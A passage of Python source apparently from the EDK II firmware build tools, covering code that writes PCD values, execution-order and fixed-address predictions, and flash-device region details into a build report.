FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
else:
if IsByteArray:
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
elif self.DefaultStoreSingle and not self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
elif not self.DefaultStoreSingle and self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
if IsStructure:
OverrideValues = Pcd.SkuOverrideValues[Sku]
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
else:
Value = SkuInfo.DefaultValue
IsByteArray, ArrayList = ByteArrayForamt(Value)
if Pcd.DatumType == 'BOOLEAN':
Value = str(int(Value, 0))
if FirstPrint:
FirstPrint = False
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
else:
if IsByteArray:
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
if self.SkuSingle:
FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
else:
FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
if TypeName in ('DYNVPD', 'DEXVPD'):
FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
if VPDPcdItem not in VPDPcdList:
VPDPcdList.append(VPDPcdItem)
if IsStructure:
FiledOverrideFlag = False
OverrideValues = Pcd.SkuOverrideValues[Sku]
if OverrideValues:
Keys = OverrideValues.keys()
OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
self.PrintStructureInfo(File, OverrideFieldStruct)
FiledOverrideFlag = True
if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
self.PrintStructureInfo(File, OverrideFieldStruct)
self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
OverrideFieldStruct = collections.OrderedDict()
if OverrideStruct:
for Key, Values in OverrideStruct.items():
if Values[1] and Values[1].endswith('.dsc'):
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromFdf:
for Key, Values in Pcd.PcdFieldValueFromFdf.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
if Pcd.PcdFieldValueFromComm:
for Key, Values in Pcd.PcdFieldValueFromComm.items():
if Key in OverrideFieldStruct and Values[0] == OverrideFieldStruct[Key][0]:
continue
OverrideFieldStruct[Key] = Values
return OverrideFieldStruct
def PrintStructureInfo(self, File, Struct):
for Key, Value in sorted(Struct.items(), key=lambda x: x[0]):
if Value[1] and 'build command options' in Value[1]:
FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
elif Value[1] and Value[1].endswith('.fdf'):
FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
else:
FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + Key, Value[0]))
def StrtoHex(self, value):
try:
value = hex(int(value))
return value
except:
if value.startswith("L\"") and value.endswith("\""):
valuelist = []
for ch in value[2:-1]:
valuelist.append(hex(ord(ch)))
valuelist.append('0x00')
return valuelist
elif value.startswith("\"") and value.endswith("\""):
return hex(ord(value[1:-1]))
elif value.startswith("{") and value.endswith("}"):
valuelist = []
if ',' not in value:
return value[1:-1]
for ch in value[1:-1].split(','):
ch = ch.strip()
if ch.startswith('0x') or ch.startswith('0X'):
valuelist.append(ch)
continue
try:
valuelist.append(hex(int(ch.strip())))
except:
pass
return valuelist
else:
return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
if GlobalData.gStructurePcd and (self.Arch in GlobalData.gStructurePcd) and ((PcdToken, PcdTokenSpaceGuid) in GlobalData.gStructurePcd[self.Arch]):
return True
else:
return False
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
    """Generate the platform execution-order prediction section and the
    per-module fixed-address prediction subsection of the build report.

    Execution order is predicted by invoking the EOT tool over the platform
    FV images plus collected source/GUID lists; fixed addresses are parsed
    from the platform's final .map file.
    """
    ##
    # Constructor function for class PredictionReport
    #
    # This constructor function generates PredictionReport object for the platform.
    #
    # @param self: The object pointer
    # @param Wa Workspace context information
    #
    def __init__(self, Wa):
        """Collect the map-file path, per-module source/GUID/entry-point data
        and the platform FV list needed by the prediction reports."""
        self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
        self._MapFileParsed = False
        self._EotToolInvoked = False
        self._FvDir = Wa.FvDir
        self._EotDir = Wa.BuildDir
        self._FfsEntryPoint = {}
        self._GuidMap = {}
        self._SourceList = []
        self.FixedMapDict = {}
        self.ItemList = []
        self.MaxLen = 0
        #
        # Collect all platform reference source files and GUID C Name
        #
        for Pa in Wa.AutoGenObjectList:
            for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
                #
                # BASE typed modules are EFI agnostic, so we need not scan
                # their source code to find PPI/Protocol produce or consume
                # information.
                #
                if Module.ModuleType == SUP_MODULE_BASE:
                    continue
                #
                # Add module referenced source files
                #
                self._SourceList.append(str(Module))
                IncludeList = {}
                for Source in Module.SourceFileList:
                    if os.path.splitext(str(Source))[1].lower() == ".c":
                        self._SourceList.append(" " + str(Source))
                        FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
                for IncludeFile in IncludeList.values():
                    self._SourceList.append(" " + IncludeFile)
                # Map every referenced PPI/Protocol/GUID C name to its GUID string
                # so EOT can resolve them.
                for Guid in Module.PpiList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
                for Guid in Module.ProtocolList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
                for Guid in Module.GuidList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
                if Module.Guid and not Module.IsLibrary:
                    EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
                    # AutoGen spec >= 1.5 modules always link through the common
                    # _ModuleEntryPoint glue symbol.
                    if int(str(Module.AutoGenVersion), 0) >= 0x00010005:
                        RealEntryPoint = "_ModuleEntryPoint"
                    else:
                        RealEntryPoint = EntryPoint
                    if EntryPoint == "_ModuleEntryPoint":
                        CCFlags = Module.BuildOption.get("CC", {}).get("FLAGS", "")
                        Match = gGlueLibEntryPoint.search(CCFlags)
                        if Match:
                            EntryPoint = Match.group(1)
                    self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
        #
        # Collect platform firmware volume list as the input of EOT.
        #
        self._FvList = []
        if Wa.FdfProfile:
            for Fd in Wa.FdfProfile.FdDict:
                for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
                    if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
                        continue
                    for FvName in FdRegion.RegionDataList:
                        if FvName in self._FvList:
                            continue
                        self._FvList.append(FvName)
                        for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                            for Section in Ffs.SectionList:
                                # Only FV-image sections expose a nested FvName;
                                # other section types raise AttributeError.
                                try:
                                    for FvSection in Section.SectionList:
                                        if FvSection.FvName in self._FvList:
                                            continue
                                        self._FvList.append(FvSection.FvName)
                                except AttributeError:
                                    pass
    ##
    # Parse platform fixed address map files
    #
    # This function parses the platform final fixed address map file to get
    # the database of predicted fixed address for module image base, entry point
    # etc.
    #
    # @param self: The object pointer
    #
    def _ParseMapFile(self):
        """Lazily parse the platform .map file into FixedMapDict
        (module GUID -> [(address type, value, '*I'|'*E'), ...])."""
        if self._MapFileParsed:
            return
        self._MapFileParsed = True
        if os.path.isfile(self._MapFileName):
            # NOTE(review): file handle is not explicitly closed and the bare
            # except downgrades any failure to a warning -- confirm intended.
            try:
                FileContents = open(self._MapFileName).read()
                for Match in gMapFileItemPattern.finditer(FileContents):
                    AddressType = Match.group(1)
                    BaseAddress = Match.group(2)
                    EntryPoint = Match.group(3)
                    Guid = Match.group(4).upper()
                    List = self.FixedMapDict.setdefault(Guid, [])
                    List.append((AddressType, BaseAddress, "*I"))
                    List.append((AddressType, EntryPoint, "*E"))
            except:
                EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
    ##
    # Invokes EOT tool to get the predicted the execution order.
    #
    # This function invokes EOT tool to calculate the predicted dispatch order
    #
    # @param self: The object pointer
    #
    def _InvokeEotTool(self):
        """Lazily run the EOT tool over the collected FVs and parse its
        dispatch list into ItemList; failures only produce a warning."""
        if self._EotToolInvoked:
            return
        self._EotToolInvoked = True
        FvFileList = []
        for FvName in self._FvList:
            FvFile = os.path.join(self._FvDir, FvName + ".Fv")
            if os.path.isfile(FvFile):
                FvFileList.append(FvFile)
        if len(FvFileList) == 0:
            return
        #
        # Write source file list and GUID file list to an intermediate file
        # as the input for EOT tool and dispatch List as the output file
        # from EOT tool.
        #
        SourceList = os.path.join(self._EotDir, "SourceFile.txt")
        GuidList = os.path.join(self._EotDir, "GuidList.txt")
        DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
        TempFile = open(SourceList, "w+")
        for Item in self._SourceList:
            FileWrite(TempFile, Item)
        TempFile.close()
        TempFile = open(GuidList, "w+")
        for Key in self._GuidMap:
            FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
        TempFile.close()
        try:
            from Eot.EotMain import Eot
            #
            # Invoke EOT tool and echo its runtime performance
            #
            EotStartTime = time.time()
            Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
                FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
            EotEndTime = time.time()
            EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
            EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
            #
            # Parse the output of EOT tool
            #
            for Line in open(DispatchList):
                if len(Line.split()) < 4:
                    continue
                (Guid, Phase, FfsName, FilePath) = Line.split()
                Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
                if len(Symbol) > self.MaxLen:
                    self.MaxLen = len(Symbol)
                self.ItemList.append((Phase, Symbol, FilePath))
        # NOTE(review): bare except also hides import errors from Eot -- the
        # warning below is the only diagnostic the user sees.
        except:
            EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
            EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
    ##
    # Generate platform execution order report
    #
    # This function generates the predicted module execution order.
    #
    # @param self The object pointer
    # @param File The file object for report
    #
    def _GenerateExecutionOrderReport(self, File):
        """Write the predicted module execution order section; no-op when
        EOT produced no items."""
        self._InvokeEotTool()
        if len(self.ItemList) == 0:
            return
        FileWrite(File, gSectionStart)
        FileWrite(File, "Execution Order Prediction")
        FileWrite(File, "*P PEI phase")
        FileWrite(File, "*D DXE phase")
        FileWrite(File, "*E Module INF entry point name")
        FileWrite(File, "*N Module notification function name")
        FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
        FileWrite(File, gSectionSep)
        for Item in self.ItemList:
            FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
        # NOTE(review): the section is closed with gSectionStart rather than
        # gSectionEnd (used for other sections) -- confirm this is intended.
        FileWrite(File, gSectionStart)
    ##
    # Generate Fixed Address report.
    #
    # This function generate the predicted fixed address report for a module
    # specified by Guid.
    #
    # @param self The object pointer
    # @param File The file object for report
    # @param Guid The module Guid value.
    # @param NotifyList The list of all notify function in a module
    #
    def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
        """Write the fixed-address prediction subsection for the module with
        the given GUID; no-op when the map file holds no entry for it."""
        self._ParseMapFile()
        FixedAddressList = self.FixedMapDict.get(Guid)
        if not FixedAddressList:
            return
        FileWrite(File, gSubSectionStart)
        FileWrite(File, "Fixed Address Prediction")
        FileWrite(File, "*I Image Loading Address")
        FileWrite(File, "*E Entry Point Address")
        FileWrite(File, "*N Notification Function Address")
        FileWrite(File, "*F Flash Address")
        FileWrite(File, "*M Memory Address")
        FileWrite(File, "*S SMM RAM Offset")
        FileWrite(File, "TOM Top of Memory")
        FileWrite(File, "Type Address Name")
        FileWrite(File, gSubSectionSep)
        for Item in FixedAddressList:
            Type = Item[0]
            Value = Item[1]
            Symbol = Item[2]
            if Symbol == "*I":
                Name = "(Image Base)"
            elif Symbol == "*E":
                Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
            elif Symbol in NotifyList:
                Name = Symbol
                Symbol = "*N"
            else:
                continue
            # Second marker letter encodes the address space of the value.
            if "Flash" in Type:
                Symbol += "F"
            elif "Memory" in Type:
                Symbol += "M"
            else:
                Symbol += "S"
            # Negative values are offsets back from the top of memory.
            if Value[0] == "-":
                Value = "TOM" + Value
            FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
    ##
    # Generate report for the prediction part
    #
    # This function generate the predicted fixed address report for a module or
    # predicted module execution order for a platform.
    # If the input Guid is None, then, it generates the predicted module execution order;
    # otherwise it generated the module fixed loading address for the module specified by
    # Guid.
    #
    # @param self The object pointer
    # @param File The file object for report
    # @param Guid The module Guid value.
    #
    def GenerateReport(self, File, Guid):
        """Dispatch: per-module fixed-address report when Guid is given,
        otherwise the platform-wide execution-order report."""
        if Guid:
            self._GenerateFixedAddressReport(File, Guid.upper(), [])
        else:
            self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
    def __init__(self, FdRegion, Wa):
        """Record region geometry, discover nested FVs (for FV regions) and
        build the GUID-to-module-name map used when reporting FV contents."""
        self.Type = FdRegion.RegionType
        self.BaseAddress = FdRegion.Offset
        self.Size = FdRegion.Size
        self.FvList = []
        self.FvInfo = {}
        self._GuidsDb = {}
        self._FvDir = Wa.FvDir
        self._WorkspaceDir = Wa.WorkspaceDir
        #
        # If the input FdRegion is not a firmware volume,
        # we are done.
        #
        if self.Type != BINARY_FILE_TYPE_FV:
            return
        #
        # Find all nested FVs in the FdRegion
        #
        for FvName in FdRegion.RegionDataList:
            if FvName in self.FvList:
                continue
            self.FvList.append(FvName)
            self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
            self._DiscoverNestedFvList(FvName, Wa)
        PlatformPcds = {}
        #
        # Collect PCDs declared in DEC files.
        #
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
                    DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
                    PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
        #
        # Collect PCDs defined in DSC file
        #
        # DSC values deliberately overwrite the DEC declarations collected above.
        for Pa in Wa.AutoGenObjectList:
            for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
                PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
        #
        # Add PEI and DXE a priori files GUIDs defined in PI specification.
        #
        self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
        self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
        #
        # Add ACPI table storage file
        #
        self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
        # Map each platform module's GUID to "BaseName (INF path)" for display.
        for Pa in Wa.AutoGenObjectList:
            for ModuleKey in Pa.Platform.Modules:
                M = Pa.Platform.Modules[ModuleKey].M
                InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
                self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
        #
        # Collect the GUID map in the FV firmware volume
        #
        for FvName in self.FvList:
            FvDictKey=FvName.upper()
            if FvDictKey in Wa.FdfProfile.FvDict:
                for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                    try:
                        #
                        # collect GUID map for binary EFI file in FDF file.
                        #
                        Guid = Ffs.NameGuid.upper()
                        # A PCD-style name GUID is resolved through the platform
                        # PCD table to its actual GUID value.
                        Match = gPcdGuidPattern.match(Ffs.NameGuid)
                        if Match:
                            PcdTokenspace = Match.group(1)
                            PcdToken = Match.group(2)
                            if (PcdToken, PcdTokenspace) in PlatformPcds:
                                GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
                                Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
                        for Section in Ffs.SectionList:
                            try:
                                ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
                                self._GuidsDb[Guid] = ModuleSectFile
                            except AttributeError:
                                pass
                    except AttributeError:
                        pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
    """Reports the FD section in the build report file.

    Collects flash-device information (base address, size, regions and the
    VPD region, if any) for one firmware device of a platform.
    """
    ##
    # Constructor function for class FdReport
    #
    # @param self            The object pointer
    # @param Fd              The current Firmware device object
    # @param Wa              Workspace context information
    #
    def __init__(self, Fd, Wa):
        self.FdName = Fd.FdUiName
        self.BaseAddress = Fd.BaseAddress
        self.Size = Fd.Size
        self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
        self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
        self.VPDBaseAddress = 0
        self.VPDSize = 0
        # Remember the first FILE region that holds the VPD tool data.
        for index, FdRegion in enumerate(Fd.RegionList):
            # BUGFIX: the original compared the region type with 'is', which
            # tests object identity, not string equality, and is not
            # guaranteed to hold even for interned literals.  Use '=='.
            if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
                self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
                self.VPDSize = self.FdRegionList[index].Size
                break
    ##
    # Generate report for the firmware device.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def GenerateReport(self, File):
        FileWrite(File, gSectionStart)
        FileWrite(File, "Firmware Device (FD)")
        FileWrite(File, "FD Name: %s" % self.FdName)
        FileWrite(File, "Base Address: %s" % self.BaseAddress)
        FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
        if len(self.FdRegionList) > 0:
            FileWrite(File, gSectionSep)
            for FdRegionItem in self.FdRegionList:
                FdRegionItem.GenerateReport(File)
        # VPDPcdList is a module-level collection filled in elsewhere during
        # PCD report generation.
        if VPDPcdList:
            VPDPcdList.sort(key=lambda x: int(x[2], 0))
            FileWrite(File, gSubSectionStart)
            FileWrite(File, "FD VPD Region")
            FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
            FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
            FileWrite(File, gSubSectionSep)
            for item in VPDPcdList:
                # Add BaseAddress for offset
                Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
                IsByteArray, ArrayList = ByteArrayForamt(item[-1])
                Skuinfo = item[1]
                if len(GlobalData.gSkuids) == 1:
                    Skuinfo = GlobalData.gSkuids[0]
                if IsByteArray:
                    FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
                    for Array in ArrayList:
                        FileWrite(File, Array)
                else:
                    FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
            FileWrite(File, gSubSectionEnd)
        FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
    """Reports the whole-platform section of the build report.

    Aggregates the platform summary plus the optional PCD, flash (FD),
